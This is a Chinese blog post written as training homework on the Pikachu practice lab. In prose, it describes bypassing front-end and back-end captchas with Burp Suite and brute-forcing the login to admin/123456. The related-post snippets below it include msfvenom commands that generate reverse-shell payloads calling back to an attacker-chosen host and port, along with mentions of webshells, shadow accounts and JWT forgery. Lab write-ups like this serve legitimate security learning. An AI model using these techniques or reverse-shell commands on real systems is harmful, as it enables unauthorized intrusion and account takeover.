在阿一网络安全培训学习第29天!课后作业之pikachu靶场

最新推荐文章于 2024-08-15 13:24:49 发布
最新推荐文章于 2024-08-15 13:24:49 发布
阅读量138 收藏
点赞数 3
文章标签: web安全 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ayixy/article/details/138304654
版权

前端验证码通过

先打开靶场随机输入账号密码以及正确的验证码登录进行抓包

随后我们发到repeater模块更改验证码试试

并没有显示验证码输入错误

说明成功绕过验证码严重

我们在进行账号密码爆破

最后爆破出账号为admin 密码为123456

我们进行登录

显示登录成功

在burp上进行同样操作

我们验证码随便写的账号密码输入正确

依旧登录成功说明我们绕过成功

后端验证码通过

与上述操作一样随便输入账号密码进行抓包

发送到repeater模块

然后发现一样只显示账号密码错误没显示验证码错误说明验证码可以使用

我们进行爆破

发送到intruder模块

将账号密码打上变量

然后进行爆破

爆破出账号密码为admin 123456

随后进行登录

网安大队长阿一
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
阿一网络安全培训学习的第20课后作业Burp靶场访问控制漏洞
Ayixy的博客
04-25 204
位于conf下的application.properties中。值是固定死的然后使用该默认key可以构造JWT。登陆时进行抓包,替换返回包中的token值。该漏洞存在的原因是因为该版本nacos中,即使账号密码错误,也可登陆后台管理界面。将生成的身份令牌添加进去。
阿一网络安全培训学习的第20课后作业—sqli-labs靶场练习
Ayixy的博客
04-16 295
因此判断注入点再中Burp查看输入单引号,判断报错得知闭合为页面产生报错语句,因此直接进行报错查询查密码1个单引号报错两个单引号正常,由此判断闭合为该关卡注释符号被过滤了可以通过单引号闭合原语句的单引号,仍可进行查询输入得知查询字段数为,且回显字段数据输入1123得知查询字段数为,且回显字段数据输入11231。
阿一网络安全培训学习的第20课后作业Burp靶场访问控制漏洞(2)
2401_84968882的博客
05-14 291
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
阿一网络安全培训学习的第20课后作业Burp靶场访问控制漏洞(1)
2401_84968812的博客
05-14 377
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
阿一网络安全培训学习第55的一次真实环境下渗透的全过程
Ayixy的博客
05-20 885
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f。msfvenom -p osx/x86/shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f macho >msfvenom -p java/jsp_shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f raw >
阿一网络安全学院练习红日靶场之通过MSF和CS上线PC机器
Ayixy的博客
06-11 342
直接去目标机器执行了一下木马,是可以上线的,也许真实场景可以想办法的钓鱼让目标主动点击。若目标机器无法出网,就得让同处于内网的跳板机,采取正向或者反向连接的方式进行上线了。已知开放了这些端口,且我们拥有域控密码信息,尝试另外一种上线方式,让跳板机。可以直接在跳板机上新建监听,然后转发上线,但生成的木马免杀有点难操作。没有拿下,这台机器开了防火墙,直接通过。进行内网信息收集,得知域控机器。,并设置定时任务运行,从而上线。进程上,无法成功,遂找了个。,但这样操作的前提是建立在。通过之前抓取的密码,建立。
阿一网络安全学院学员课后练习—xss靶场
Ayixy的博客
08-06 278
ng-include 指令就是文件包涵的意思,用来包涵外部的 html 文件,如果包涵的内容是地址,根据源码猜解传参的参数名,隐藏的 input 标签可以插入 type="text"显示、看了源代码后发现这里先是将字母小写化了,再把 script 替换成空格,最后将空格给实体化。href 属性自动解析 Unicode 编码。也没啥区别就是把 cookie 改了一下。是利用转跳到的网站以达到弹窗的效果。
阿一网络安全课后作业之msfvemon生成php的webshell,用msf的handler连接
Ayixy的博客
07-29 300
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中。getpid # 获取当前进程的pid。先用msf生成php的webshell。我们直接远程连接在本地直接创建影子账户。然后开启3389远程连接直接远程登录。ps # 查看当前活跃进程。sf生成个exe文件然后反向连接。开启handler监听。
阿一网络安全培训中心带你回顾Windos/Linux 反弹 shell
qq_69775412的博客
06-05 880
最近都在打内网,就从最基础的知识开始学习、整理。
阿一鲍鱼-阿一鲍鱼1980.docx
11-25
阿一鲍鱼-阿一鲍鱼1980.docx
谓词归结逻辑第三版,彻底修改错误,此处特别鸣谢阿一同学的监工与验收
03-13
人工智能实验
南昌赣江新地项目品牌推广策略案_76PPT_九机构.pptx
11-24
第二阶段是行动阶段,通过消费者的实际体验,建立良好的口碑,促进重复消费;第三阶段是忠诚阶段,消费者不仅会重复消费,还会形成对品牌的推崇和消费习惯。 要形成品牌忠诚度,关键在于理解消费者需求并提供优质...
最新-英语国际音标表(48个)word版-绝对准确!-最新音标表.doc
10-06
【英语国际音标表详解】 英语国际音标是学习英语发音的重要工具,它为每个英语音素提供了标准化的表示方式,使得非母语者能够更...在学习过程中,可以结合单词和句子进行实践,以便更好地理解它们在实际语言中的应用。
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 645
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
Animetronic - hackmyvm
tanbinn的博客
08-12 446
hackmyvm的Animetronic靶场
网络协议八 网络安全相关
hunandede的博客
08-12 389
ARP欺骗的防护原理。
人工智能在网络安全威胁测试中的应用:LLMs如何改变网络威胁格局
python12222_的博客
08-12 684
本文通过初步探索和实验验证了LLMs在网络安全威胁测试中的应用潜力。我们发现LLMs能够自动化决策过程,提供高质量的响应,并在一定程度上提升防御系统的能力。然而,我们也意识到LLMs技术的滥用风险和对未来网络安全威胁格局的潜在影响。未来的研究需要进一步探讨LLMs在更复杂网络环境中的应用能力,以及如何负责任地使用这些技术来增强网络安全。通过本文的研究,我们希望能够激发更多关于LLMs在网络安全中应用的讨论和研究,推动该领域的发展,并为未来的网络安全防护提供新的思路和方法。​。
网络安全】密码重置中毒实现账户接管
最新发布
等风来
08-15 32
我输入了新密码,点击“重置密码”。然后,我被导航到登录页面,在那里我输入了电子邮件和新密码,最后成功登录了账户,说明此漏洞是有效的。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值